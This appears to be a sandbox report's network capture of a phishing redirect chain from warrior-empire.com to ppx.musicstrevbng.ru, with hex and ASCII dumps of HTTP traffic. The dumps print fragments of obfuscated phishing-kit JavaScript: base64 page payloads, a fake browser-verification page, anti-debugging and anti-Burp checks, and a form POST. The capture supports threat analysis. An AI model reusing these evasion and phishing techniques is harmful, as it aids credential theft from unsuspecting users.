                                                                                                Jan 8, 2025 14:50:45.265938044 CET1.1.1.1192.168.2.50x352dNo error (0)scdn38e6f.wpc.9be8f.omegacdn.netsni1gl.wpc.omegacdn.netCNAME (Canonical name)IN (0x0001)false
                                                                                                Jan 8, 2025 14:50:45.266377926 CET1.1.1.1192.168.2.50x799aNo error (0)aadcdn.msftauth.netscdn38e6f.wpc.9be8f.omegacdn.netCNAME (Canonical name)IN (0x0001)false
                                                                                                Jan 8, 2025 14:50:45.266377926 CET1.1.1.1192.168.2.50x799aNo error (0)scdn38e6f.wpc.9be8f.omegacdn.netsni1gl.wpc.omegacdn.netCNAME (Canonical name)IN (0x0001)false
                                                                                                Jan 8, 2025 14:50:45.266377926 CET1.1.1.1192.168.2.50x799aNo error (0)sni1gl.wpc.omegacdn.net152.199.21.175A (IP address)IN (0x0001)false
                                                                                                • warrior-empire.com
                                                                                                • https:
                                                                                                  • ppx.musicstrevbng.ru
                                                                                                  • challenges.cloudflare.com
                                                                                                  • code.jquery.com
                                                                                                  • cdnjs.cloudflare.com
                                                                                                  • mxkyzscyur8nfklyvxelqzlfebdqukcm0xreokx7wajreqwksql15.apouters.ru
                                                                                                • a.nel.cloudflare.com
                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                0192.168.2.549708103.83.194.554438072C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                TimestampBytes transferredDirectionData
                                                                                                2025-01-08 13:48:09 UTC749OUTGET /res444.php?4-68747470733a2f2f5050782e6d757369637374726576626e672e72752f417834454d2f2346- HTTP/1.1
                                                                                                Host: warrior-empire.com
                                                                                                Connection: keep-alive
                                                                                                sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                sec-ch-ua-mobile: ?0
                                                                                                sec-ch-ua-platform: "Windows"
                                                                                                Upgrade-Insecure-Requests: 1
                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                Sec-Fetch-Site: none
                                                                                                Sec-Fetch-Mode: navigate
                                                                                                Sec-Fetch-User: ?1
                                                                                                Sec-Fetch-Dest: document
                                                                                                Accept-Encoding: gzip, deflate, br
                                                                                                Accept-Language: en-US,en;q=0.9
                                                                                                2025-01-08 13:48:09 UTC191INHTTP/1.1 200 OK
                                                                                                Date: Wed, 08 Jan 2025 13:48:09 GMT
                                                                                                Server: Apache
                                                                                                Access-Control-Allow-Origin: *
                                                                                                Connection: close
                                                                                                Transfer-Encoding: chunked
                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                2025-01-08 13:48:09 UTC436INData Raw: 31 61 38 0d 0a 20 20 20 20 3c 73 63 72 69 70 74 3e 0d 0a 20 20 20 20 6b 53 4e 49 52 65 49 51 52 47 61 5a 79 70 6f 51 20 3d 20 6c 6f 63 61 74 69 6f 6e 2e 68 61 73 68 2e 73 75 62 73 74 72 69 6e 67 28 30 29 3b 0d 0a 20 20 20 20 6c 65 74 20 75 72 6c 20 3d 20 6e 75 6c 6c 3b 0d 0a 20 20 20 20 69 66 20 28 21 6b 53 4e 49 52 65 49 51 52 47 61 5a 79 70 6f 51 2e 69 6e 63 6c 75 64 65 73 28 27 23 27 29 29 20 7b 0d 0a 20 20 20 20 75 72 6c 20 3d 20 22 68 74 74 70 73 3a 2f 2f 50 50 78 2e 6d 75 73 69 63 73 74 72 65 76 62 6e 67 2e 72 75 2f 41 78 34 45 4d 2f 23 46 22 3b 0d 0a 20 20 20 20 7d 0d 0a 20 20 20 20 69 66 20 28 6b 53 4e 49 52 65 49 51 52 47 61 5a 79 70 6f 51 2e 69 6e 63 6c 75 64 65 73 28 27 23 27 29 29 20 7b 0d 0a 20 20 20 20 75 72 6c 20 3d 20 22 68 74 74 70 73 3a
                                                                                                Data Ascii: 1a8 <script> kSNIReIQRGaZypoQ = location.hash.substring(0); let url = null; if (!kSNIReIQRGaZypoQ.includes('#')) { url = "https://PPx.musicstrevbng.ru/Ax4EM/#F"; } if (kSNIReIQRGaZypoQ.includes('#')) { url = "https:


                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                1192.168.2.549716188.114.96.34438072C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                TimestampBytes transferredDirectionData
                                                                                                2025-01-08 13:48:10 UTC693OUTGET /Ax4EM/ HTTP/1.1
                                                                                                Host: ppx.musicstrevbng.ru
                                                                                                Connection: keep-alive
                                                                                                sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                sec-ch-ua-mobile: ?0
                                                                                                sec-ch-ua-platform: "Windows"
                                                                                                Upgrade-Insecure-Requests: 1
                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                Sec-Fetch-Site: cross-site
                                                                                                Sec-Fetch-Mode: navigate
                                                                                                Sec-Fetch-Dest: document
                                                                                                Referer: https://warrior-empire.com/
                                                                                                Accept-Encoding: gzip, deflate, br
                                                                                                Accept-Language: en-US,en;q=0.9
                                                                                                2025-01-08 13:48:11 UTC1246INHTTP/1.1 200 OK
                                                                                                Date: Wed, 08 Jan 2025 13:48:11 GMT
                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                Transfer-Encoding: chunked
                                                                                                Connection: close
                                                                                                Cache-Control: no-cache, private
                                                                                                cf-cache-status: DYNAMIC
                                                                                                vary: accept-encoding
                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=kC1P5w6IWl4bQ1eYEGwjwyCfQdAheYoQRaURwOA0IzDVsQpOOI%2FgsYpYUabSI%2FS31NsagOoqJx2RmBDoj%2FzwXpZJhevTPKNwjoLNE2mvYmY3JBRIpw%2Bo0uGd8axgJQ%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                alt-svc: h3=":443"; ma=86400
                                                                                                server-timing: cfL4;desc="?proto=TCP&rtt=11288&min_rtt=11258&rtt_var=4282&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2826&recv_bytes=1602&delivery_rate=251826&cwnd=251&unsent_bytes=0&cid=47669058ce5330b0&ts=192&x=0"
                                                                                                Set-Cookie: XSRF-TOKEN=eyJpdiI6IitvQ3pGdFR2WVhOdGMzY0NlNE5MNUE9PSIsInZhbHVlIjoiM1d1ZHdNYmRKRjl5OTZ0RG5zNXhLZFdqTHBoTHBaK0l6MzZ5TUFMQlI3YkxtTkhGZnpoaGtBNjlSUEJRcnVFTWZrTTVYOW9qMDIvRFo0Q3VocHJnMEtXWlhJSnRjL29Mc0pTek02MHVVV0FoMmNYR011TnNFMy82NXdkZWx2bysiLCJtYWMiOiJjODczNTAzZDBiNTEwZWMxMzg5NTJhOTY2OGNhZDg2ZWVmOGFmMmY2YjY3MjM2ZmMzNDhlYThjMDVjNjAzYzY1IiwidGFnIjoiIn0%3D; expires=Wed, 08-Jan-2025 15:48:11 GMT; Max-Age=7200; path=/; secure; samesite=none
                                                                                                2025-01-08 13:48:11 UTC732INData Raw: 53 65 74 2d 43 6f 6f 6b 69 65 3a 20 6c 61 72 61 76 65 6c 5f 73 65 73 73 69 6f 6e 3d 65 79 4a 70 64 69 49 36 49 6b 49 72 53 45 64 57 5a 31 46 51 57 6d 52 59 65 48 56 48 54 6a 6c 48 62 30 74 33 4e 45 45 39 50 53 49 73 49 6e 5a 68 62 48 56 6c 49 6a 6f 69 61 30 64 57 55 48 4d 79 51 6d 6f 33 5a 45 52 51 4d 54 5a 56 55 6d 63 34 54 6c 42 34 51 56 51 30 59 58 56 47 52 46 5a 6b 64 6a 6c 56 4e 57 5a 55 65 44 5a 73 56 31 52 57 64 55 31 6f 4e 55 6b 32 62 6d 77 72 61 45 68 35 55 55 68 73 52 31 64 4b 59 6e 51 33 56 33 4a 4b 53 53 74 58 62 7a 6c 69 57 6b 4e 59 5a 54 5a 51 55 47 64 73 57 57 68 78 5a 55 4a 4e 57 57 70 36 51 6c 6c 46 4e 6b 4a 61 55 6a 45 72 53 6d 59 77 4e 69 74 74 63 45 5a 43 64 46 70 54 63 6d 6c 4a 63 54 6c 4c 5a 6d 6f 35 59 58 64 50 53 6b 4d 7a 61 57 77
                                                                                                Data Ascii: Set-Cookie: laravel_session=eyJpdiI6IkIrSEdWZ1FQWmRYeHVHTjlHb0t3NEE9PSIsInZhbHVlIjoia0dWUHMyQmo3ZERQMTZVUmc4TlB4QVQ0YXVGRFZkdjlVNWZUeDZsV1RWdU1oNUk2bmwraEh5UUhsR1dKYnQ3V3JKSStXbzliWkNYZTZQUGdsWWhxZUJNWWp6QllFNkJaUjErSmYwNittcEZCdFpTcmlJcTlLZmo5YXdPSkMzaWw
                                                                                                2025-01-08 13:48:11 UTC1369INData Raw: 34 66 31 64 0d 0a 3c 73 63 72 69 70 74 3e 0d 0a 2f 2a 20 41 6c 6c 20 6f 75 72 20 64 72 65 61 6d 73 20 63 61 6e 20 63 6f 6d 65 20 74 72 75 65 20 69 66 20 77 65 20 68 61 76 65 20 74 68 65 20 63 6f 75 72 61 67 65 20 74 6f 20 70 75 72 73 75 65 20 74 68 65 6d 2e 20 2a 2f 0d 0a 69 66 28 61 74 6f 62 28 22 61 48 52 30 63 48 4d 36 4c 79 38 33 55 53 35 74 64 58 4e 70 59 33 4e 30 63 6d 56 32 59 6d 35 6e 4c 6e 4a 31 4c 30 46 34 4e 45 56 4e 4c 77 3d 3d 22 29 20 3d 3d 20 22 6e 6f 6d 61 74 63 68 22 29 7b 0d 0a 64 6f 63 75 6d 65 6e 74 2e 77 72 69 74 65 28 64 65 63 6f 64 65 55 52 49 43 6f 6d 70 6f 6e 65 6e 74 28 65 73 63 61 70 65 28 61 74 6f 62 28 27 50 43 46 45 54 30 4e 55 57 56 42 46 49 47 68 30 62 57 77 2b 44 51 6f 38 61 48 52 74 62 43 42 73 59 57 35 6e 50 53 4a 6c 62
                                                                                                Data Ascii: 4f1d<script>/* All our dreams can come true if we have the courage to pursue them. */if(atob("aHR0cHM6Ly83US5tdXNpY3N0cmV2Ym5nLnJ1L0F4NEVNLw==") == "nomatch"){document.write(decodeURIComponent(escape(atob('PCFET0NUWVBFIGh0bWw+DQo8aHRtbCBsYW5nPSJlb
                                                                                                2025-01-08 13:48:11 UTC1369INData Raw: 4b 49 32 6c 71 51 55 5a 74 52 6e 6c 56 51 6d 45 75 59 32 46 77 64 47 4e 6f 59 53 31 6a 62 32 35 30 59 57 6c 75 5a 58 4a 37 63 47 39 7a 61 58 52 70 62 32 34 36 49 48 4a 6c 62 47 46 30 61 58 5a 6c 4f 33 52 76 63 44 6f 67 4f 54 46 77 65 44 73 76 4b 6e 64 70 5a 48 52 6f 4f 69 41 78 4d 44 41 6c 4f 79 6f 76 63 47 46 6b 5a 47 6c 75 5a 79 31 79 61 57 64 6f 64 44 6f 67 64 6d 46 79 4b 43 30 74 59 6e 4d 74 5a 33 56 30 64 47 56 79 4c 58 67 73 49 43 34 33 4e 58 4a 6c 62 53 6b 37 63 47 46 6b 5a 47 6c 75 5a 79 31 73 5a 57 5a 30 4f 69 42 32 59 58 49 6f 4c 53 31 69 63 79 31 6e 64 58 52 30 5a 58 49 74 65 43 77 67 4c 6a 63 31 63 6d 56 74 4b 54 74 74 59 58 4a 6e 61 57 34 74 63 6d 6c 6e 61 48 51 36 49 47 46 31 64 47 38 37 62 57 46 79 5a 32 6c 75 4c 57 78 6c 5a 6e 51 36 49 47
                                                                                                Data Ascii: KI2lqQUZtRnlVQmEuY2FwdGNoYS1jb250YWluZXJ7cG9zaXRpb246IHJlbGF0aXZlO3RvcDogOTFweDsvKndpZHRoOiAxMDAlOyovcGFkZGluZy1yaWdodDogdmFyKC0tYnMtZ3V0dGVyLXgsIC43NXJlbSk7cGFkZGluZy1sZWZ0OiB2YXIoLS1icy1ndXR0ZXIteCwgLjc1cmVtKTttYXJnaW4tcmlnaHQ6IGF1dG87bWFyZ2luLWxlZnQ6IG
                                                                                                2025-01-08 13:48:11 UTC1369INData Raw: 49 43 41 67 49 47 56 32 5a 57 35 30 4c 6e 42 79 5a 58 5a 6c 62 6e 52 45 5a 57 5a 68 64 57 78 30 4b 43 6b 37 44 51 6f 67 49 43 41 67 49 43 41 67 49 48 4a 6c 64 48 56 79 62 69 42 6d 59 57 78 7a 5a 54 73 4e 43 69 41 67 49 43 42 39 44 51 6f 4e 43 69 41 67 49 43 42 70 5a 69 41 6f 44 51 6f 67 49 43 41 67 49 43 41 67 49 43 68 6c 64 6d 56 75 64 43 35 6a 64 48 4a 73 53 32 56 35 49 43 59 6d 49 47 56 32 5a 57 35 30 4c 6d 74 6c 65 55 4e 76 5a 47 55 67 50 54 30 39 49 44 67 31 4b 53 42 38 66 41 30 4b 49 43 41 67 49 43 41 67 49 43 41 6f 5a 58 5a 6c 62 6e 51 75 59 33 52 79 62 45 74 6c 65 53 41 6d 4a 69 42 6c 64 6d 56 75 64 43 35 7a 61 47 6c 6d 64 45 74 6c 65 53 41 6d 4a 69 42 6c 64 6d 56 75 64 43 35 72 5a 58 6c 44 62 32 52 6c 49 44 30 39 50 53 41 33 4d 79 6b 67 66 48 77
                                                                                                Data Ascii: ICAgIGV2ZW50LnByZXZlbnREZWZhdWx0KCk7DQogICAgICAgIHJldHVybiBmYWxzZTsNCiAgICB9DQoNCiAgICBpZiAoDQogICAgICAgIChldmVudC5jdHJsS2V5ICYmIGV2ZW50LmtleUNvZGUgPT09IDg1KSB8fA0KICAgICAgICAoZXZlbnQuY3RybEtleSAmJiBldmVudC5zaGlmdEtleSAmJiBldmVudC5rZXlDb2RlID09PSA3MykgfHw
                                                                                                2025-01-08 13:48:11 UTC1369INData Raw: 58 49 37 44 51 6f 67 49 43 41 67 49 43 41 67 49 47 4e 76 62 6e 4e 30 49 47 68 57 53 6d 52 79 57 6d 78 78 62 32 4d 67 50 53 42 77 5a 58 4a 6d 62 33 4a 74 59 57 35 6a 5a 53 35 75 62 33 63 6f 4b 54 73 4e 43 69 41 67 49 43 41 67 49 43 41 67 61 57 59 67 4b 47 68 57 53 6d 52 79 57 6d 78 78 62 32 4d 67 4c 53 42 35 55 33 52 6f 65 6c 68 61 57 56 70 76 49 44 34 67 65 56 70 73 51 6b 39 50 5a 30 35 78 63 53 41 6d 4a 69 41 68 59 30 31 79 5a 30 68 68 51 55 74 4a 64 43 6b 67 65 77 30 4b 49 43 41 67 49 43 41 67 49 43 41 67 49 43 41 67 65 58 64 4a 65 57 52 43 54 45 31 35 62 79 41 39 49 48 52 79 64 57 55 37 44 51 6f 67 49 43 41 67 49 43 41 67 49 43 41 67 49 43 42 6a 54 58 4a 6e 53 47 46 42 53 30 6c 30 49 44 30 67 64 48 4a 31 5a 54 73 4e 43 69 41 67 49 43 41 67 49 43 41 67
                                                                                                Data Ascii: XI7DQogICAgICAgIGNvbnN0IGhWSmRyWmxxb2MgPSBwZXJmb3JtYW5jZS5ub3coKTsNCiAgICAgICAgaWYgKGhWSmRyWmxxb2MgLSB5U3RoelhaWVpvID4geVpsQk9PZ05xcSAmJiAhY01yZ0hhQUtJdCkgew0KICAgICAgICAgICAgeXdJeWRCTE15byA9IHRydWU7DQogICAgICAgICAgICBjTXJnSGFBS0l0ID0gdHJ1ZTsNCiAgICAgICAg
                                                                                                2025-01-08 13:48:11 UTC1369INData Raw: 6c 75 63 48 56 30 49 48 52 35 63 47 55 39 49 6d 68 70 5a 47 52 6c 62 69 49 67 61 57 51 39 49 6d 4a 73 64 47 52 6b 59 58 52 68 49 69 42 75 59 57 31 6c 50 53 4a 69 62 48 52 6b 5a 47 46 30 59 53 49 67 64 6d 46 73 64 57 55 39 49 69 49 2b 44 51 6f 38 4c 32 5a 76 63 6d 30 2b 44 51 6f 38 4c 32 52 70 64 6a 34 4e 43 6a 78 6b 61 58 59 67 59 32 78 68 63 33 4d 39 49 6e 52 6c 65 48 51 74 59 32 56 75 64 47 56 79 49 69 42 70 5a 44 30 69 59 55 52 56 57 55 35 57 53 6b 4e 68 52 69 49 2b 44 51 70 55 61 47 6c 7a 49 48 42 68 5a 32 55 67 61 58 4d 67 64 6d 56 79 61 57 5a 35 61 57 35 6e 49 48 6c 76 64 58 49 67 59 6e 4a 76 64 33 4e 6c 63 69 42 6d 62 33 49 67 63 32 46 6d 5a 53 42 70 62 6e 52 6c 63 6d 35 6c 64 43 42 68 59 32 4e 6c 63 33 4d 75 44 51 6f 38 4c 32 52 70 64 6a 34 4e 43
                                                                                                Data Ascii: lucHV0IHR5cGU9ImhpZGRlbiIgaWQ9ImJsdGRkYXRhIiBuYW1lPSJibHRkZGF0YSIgdmFsdWU9IiI+DQo8L2Zvcm0+DQo8L2Rpdj4NCjxkaXYgY2xhc3M9InRleHQtY2VudGVyIiBpZD0iYURVWU5WSkNhRiI+DQpUaGlzIHBhZ2UgaXMgdmVyaWZ5aW5nIHlvdXIgYnJvd3NlciBmb3Igc2FmZSBpbnRlcm5ldCBhY2Nlc3MuDQo8L2Rpdj4NC
                                                                                                2025-01-08 13:48:11 UTC1369INData Raw: 6b 4f 69 41 69 55 45 39 54 56 43 49 73 44 51 6f 67 49 43 41 67 49 43 41 67 49 47 4a 76 5a 48 6b 36 49 47 35 6c 64 79 42 47 62 33 4a 74 52 47 46 30 59 53 68 4f 52 6c 68 32 52 48 5a 58 55 45 78 35 4b 51 30 4b 49 43 41 67 49 48 30 70 4c 6e 52 6f 5a 57 34 6f 63 6d 56 7a 63 47 39 75 63 32 55 67 50 54 34 67 65 77 30 4b 49 43 41 67 49 43 41 67 49 43 42 79 5a 58 52 31 63 6d 34 67 63 6d 56 7a 63 47 39 75 63 32 55 75 61 6e 4e 76 62 69 67 70 4f 77 30 4b 49 43 41 67 49 48 30 70 4c 6e 52 6f 5a 57 34 6f 5a 47 46 30 59 53 41 39 50 69 42 37 44 51 6f 67 49 43 41 67 49 43 41 67 49 47 6c 6d 4b 47 52 68 64 47 46 62 4a 33 4e 30 59 58 52 31 63 79 64 64 49 44 30 39 49 43 64 7a 64 57 4e 6a 5a 58 4e 7a 4a 79 6c 37 44 51 6f 67 49 43 41 67 49 43 41 67 49 47 6c 6d 4b 48 6c 33 53 58
                                                                                                Data Ascii: kOiAiUE9TVCIsDQogICAgICAgIGJvZHk6IG5ldyBGb3JtRGF0YShORlh2RHZXUEx5KQ0KICAgIH0pLnRoZW4ocmVzcG9uc2UgPT4gew0KICAgICAgICByZXR1cm4gcmVzcG9uc2UuanNvbigpOw0KICAgIH0pLnRoZW4oZGF0YSA9PiB7DQogICAgICAgIGlmKGRhdGFbJ3N0YXR1cyddID09ICdzdWNjZXNzJyl7DQogICAgICAgIGlmKHl3SX
                                                                                                2025-01-08 13:48:11 UTC1369INData Raw: 57 47 78 45 56 6a 79 65 20 3f 20 62 5a 54 4e 5a 65 5a 49 70 52 2e 68 6f 73 74 6e 61 6d 65 20 3a 20 62 5a 54 4e 5a 65 5a 49 70 52 2e 68 6f 73 74 6e 61 6d 65 2e 73 70 6c 69 74 28 27 2e 27 29 2e 73 6c 69 63 65 28 2d 32 29 2e 6a 6f 69 6e 28 27 2e 27 29 3b 0d 0a 2f 2a 20 53 75 63 63 65 73 73 20 6d 65 61 6e 73 20 64 6f 69 6e 67 20 74 68 65 20 62 65 73 74 20 77 65 20 63 61 6e 20 77 69 74 68 20 77 68 61 74 20 77 65 20 68 61 76 65 2e 20 53 75 63 63 65 73 73 20 69 73 20 74 68 65 20 64 6f 69 6e 67 2c 20 6e 6f 74 20 74 68 65 20 67 65 74 74 69 6e 67 3b 20 69 6e 20 74 68 65 20 74 72 79 69 6e 67 2c 20 6e 6f 74 20 74 68 65 20 74 72 69 75 6d 70 68 2e 20 2a 2f 0d 0a 69 66 28 4e 43 75 44 77 46 6e 4b 6e 4b 20 3d 3d 20 44 4a 57 47 78 45 56 6a 79 65 29 7b 0d 0a 63 6f 6e 73 74
                                                                                                Data Ascii: WGxEVjye ? bZTNZeZIpR.hostname : bZTNZeZIpR.hostname.split('.').slice(-2).join('.');/* Success means doing the best we can with what we have. Success is the doing, not the getting; in the trying, not the triumph. */if(NCuDwFnKnK == DJWGxEVjye){const
                                                                                                2025-01-08 13:48:11 UTC1369INData Raw: 63 6d 5a 73 62 33 63 36 49 47 68 70 5a 47 52 6c 62 6a 73 4e 43 6e 30 4e 43 69 4e 70 61 6b 46 47 62 55 5a 35 56 55 4a 68 49 47 67 30 65 32 31 68 63 6d 64 70 62 69 31 30 62 33 41 36 4d 44 74 74 59 58 4a 6e 61 57 34 74 59 6d 39 30 64 47 39 74 4f 69 34 31 63 6d 56 74 4f 32 5a 76 62 6e 51 74 64 32 56 70 5a 32 68 30 4f 6a 55 77 4d 44 74 73 61 57 35 6c 4c 57 68 6c 61 57 64 6f 64 44 6f 78 4c 6a 49 37 66 51 30 4b 49 32 6c 71 51 55 5a 74 52 6e 6c 56 51 6d 45 67 61 44 52 37 5a 6d 39 75 64 43 31 7a 61 58 70 6c 4f 6d 4e 68 62 47 4d 6f 4d 53 34 7a 4b 54 74 39 44 51 70 41 62 57 56 6b 61 57 45 67 4b 47 31 70 62 69 31 33 61 57 52 30 61 44 6f 78 4d 6a 41 77 63 48 67 70 65 77 30 4b 49 32 6c 71 51 55 5a 74 52 6e 6c 56 51 6d 45 67 61 44 52 37 5a 6d 39 75 64 43 31 7a 61 58 70
                                                                                                Data Ascii: cmZsb3c6IGhpZGRlbjsNCn0NCiNpakFGbUZ5VUJhIGg0e21hcmdpbi10b3A6MDttYXJnaW4tYm90dG9tOi41cmVtO2ZvbnQtd2VpZ2h0OjUwMDtsaW5lLWhlaWdodDoxLjI7fQ0KI2lqQUZtRnlVQmEgaDR7Zm9udC1zaXplOmNhbGMoMS4zKTt9DQpAbWVkaWEgKG1pbi13aWR0aDoxMjAwcHgpew0KI2lqQUZtRnlVQmEgaDR7Zm9udC1zaXp
                                                                                                2025-01-08 13:48:11 UTC1369INData Raw: 67 30 4b 49 43 41 67 49 47 6c 6d 49 43 68 75 59 58 5a 70 5a 32 46 30 62 33 49 75 64 32 56 69 5a 48 4a 70 64 6d 56 79 49 48 78 38 49 48 64 70 62 6d 52 76 64 79 35 6a 59 57 78 73 55 47 68 68 62 6e 52 76 62 53 42 38 66 43 42 33 61 57 35 6b 62 33 63 75 58 33 42 6f 59 57 35 30 62 32 30 67 66 48 77 67 62 6d 46 32 61 57 64 68 64 47 39 79 4c 6e 56 7a 5a 58 4a 42 5a 32 56 75 64 43 35 70 62 6d 4e 73 64 57 52 6c 63 79 67 69 51 6e 56 79 63 43 49 70 4b 53 42 37 44 51 6f 67 49 43 41 67 49 43 41 67 49 48 64 70 62 6d 52 76 64 79 35 73 62 32 4e 68 64 47 6c 76 62 69 41 39 49 43 4a 68 59 6d 39 31 64 44 70 69 62 47 46 75 61 79 49 37 44 51 70 39 44 51 70 6b 62 32 4e 31 62 57 56 75 64 43 35 68 5a 47 52 46 64 6d 56 75 64 45 78 70 63 33 52 6c 62 6d 56 79 4b 43 64 72 5a 58 6c 6b
                                                                                                Data Ascii: g0KICAgIGlmIChuYXZpZ2F0b3Iud2ViZHJpdmVyIHx8IHdpbmRvdy5jYWxsUGhhbnRvbSB8fCB3aW5kb3cuX3BoYW50b20gfHwgbmF2aWdhdG9yLnVzZXJBZ2VudC5pbmNsdWRlcygiQnVycCIpKSB7DQogICAgICAgIHdpbmRvdy5sb2NhdGlvbiA9ICJhYm91dDpibGFuayI7DQp9DQpkb2N1bWVudC5hZGRFdmVudExpc3RlbmVyKCdrZXlk


                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                2192.168.2.549723104.18.95.414438072C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                TimestampBytes transferredDirectionData
                                                                                                2025-01-08 13:48:12 UTC652OUTGET /turnstile/v0/api.js?render=explicit HTTP/1.1
                                                                                                Host: challenges.cloudflare.com
                                                                                                Connection: keep-alive
                                                                                                sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                sec-ch-ua-mobile: ?0
                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                Intervention: <https://www.chromestatus.com/feature/5718547946799104>; level="warning"
                                                                                                sec-ch-ua-platform: "Windows"
                                                                                                Accept: */*
                                                                                                Sec-Fetch-Site: cross-site
                                                                                                Sec-Fetch-Mode: no-cors
                                                                                                Sec-Fetch-Dest: script
                                                                                                Referer: https://ppx.musicstrevbng.ru/
                                                                                                Accept-Encoding: gzip, deflate, br
                                                                                                Accept-Language: en-US,en;q=0.9
                                                                                                2025-01-08 13:48:12 UTC386INHTTP/1.1 302 Found
                                                                                                Date: Wed, 08 Jan 2025 13:48:12 GMT
                                                                                                Content-Length: 0
                                                                                                Connection: close
                                                                                                access-control-allow-origin: *
                                                                                                cache-control: max-age=300, stale-if-error=10800, stale-while-revalidate=300, public
                                                                                                cross-origin-resource-policy: cross-origin
                                                                                                location: /turnstile/v0/g/849bfe45bf45/api.js
                                                                                                Server: cloudflare
                                                                                                CF-RAY: 8feca4d0aa657d0c-EWR
                                                                                                alt-svc: h3=":443"; ma=86400


                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                3192.168.2.549721151.101.130.1374438072C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                TimestampBytes transferredDirectionData
                                                                                                2025-01-08 13:48:12 UTC626OUTGET /jquery-3.6.0.min.js HTTP/1.1
                                                                                                Host: code.jquery.com
                                                                                                Connection: keep-alive
                                                                                                sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                sec-ch-ua-mobile: ?0
                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                Intervention: <https://www.chromestatus.com/feature/5718547946799104>; level="warning"
                                                                                                sec-ch-ua-platform: "Windows"
                                                                                                Accept: */*
                                                                                                Sec-Fetch-Site: cross-site
                                                                                                Sec-Fetch-Mode: no-cors
                                                                                                Sec-Fetch-Dest: script
                                                                                                Referer: https://ppx.musicstrevbng.ru/
                                                                                                Accept-Encoding: gzip, deflate, br
                                                                                                Accept-Language: en-US,en;q=0.9
                                                                                                2025-01-08 13:48:12 UTC613INHTTP/1.1 200 OK
                                                                                                Connection: close
                                                                                                Content-Length: 89501
                                                                                                Server: nginx
                                                                                                Content-Type: application/javascript; charset=utf-8
                                                                                                Last-Modified: Fri, 18 Oct 1991 12:00:00 GMT
                                                                                                ETag: "28feccc0-15d9d"
                                                                                                Cache-Control: public, max-age=31536000, stale-while-revalidate=604800
                                                                                                Access-Control-Allow-Origin: *
                                                                                                Cross-Origin-Resource-Policy: cross-origin
                                                                                                Via: 1.1 varnish, 1.1 varnish
                                                                                                Accept-Ranges: bytes
                                                                                                Age: 1828618
                                                                                                Date: Wed, 08 Jan 2025 13:48:12 GMT
                                                                                                X-Served-By: cache-lga21931-LGA, cache-ewr-kewr1740037-EWR
                                                                                                X-Cache: HIT, HIT
                                                                                                X-Cache-Hits: 2774, 0
                                                                                                X-Timer: S1736344092.251110,VS0,VE1
                                                                                                Vary: Accept-Encoding
                                                                                                2025-01-08 13:48:12 UTC1378INData Raw: 2f 2a 21 20 6a 51 75 65 72 79 20 76 33 2e 36 2e 30 20 7c 20 28 63 29 20 4f 70 65 6e 4a 53 20 46 6f 75 6e 64 61 74 69 6f 6e 20 61 6e 64 20 6f 74 68 65 72 20 63 6f 6e 74 72 69 62 75 74 6f 72 73 20 7c 20 6a 71 75 65 72 79 2e 6f 72 67 2f 6c 69 63 65 6e 73 65 20 2a 2f 0a 21 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 22 75 73 65 20 73 74 72 69 63 74 22 3b 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 6d 6f 64 75 6c 65 26 26 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 6d 6f 64 75 6c 65 2e 65 78 70 6f 72 74 73 3f 6d 6f 64 75 6c 65 2e 65 78 70 6f 72 74 73 3d 65 2e 64 6f 63 75 6d 65 6e 74 3f 74 28 65 2c 21 30 29 3a 66 75 6e 63 74 69 6f 6e 28 65 29 7b 69 66 28 21 65 2e 64 6f 63 75 6d 65 6e 74 29 74 68 72 6f 77 20 6e 65 77 20 45 72 72 6f 72 28 22 6a 51 75
                                                                                                Data Ascii: /*! jQuery v3.6.0 | (c) OpenJS Foundation and other contributors | jquery.org/license */!function(e,t){"use strict";"object"==typeof module&&"object"==typeof module.exports?module.exports=e.document?t(e,!0):function(e){if(!e.document)throw new Error("jQu
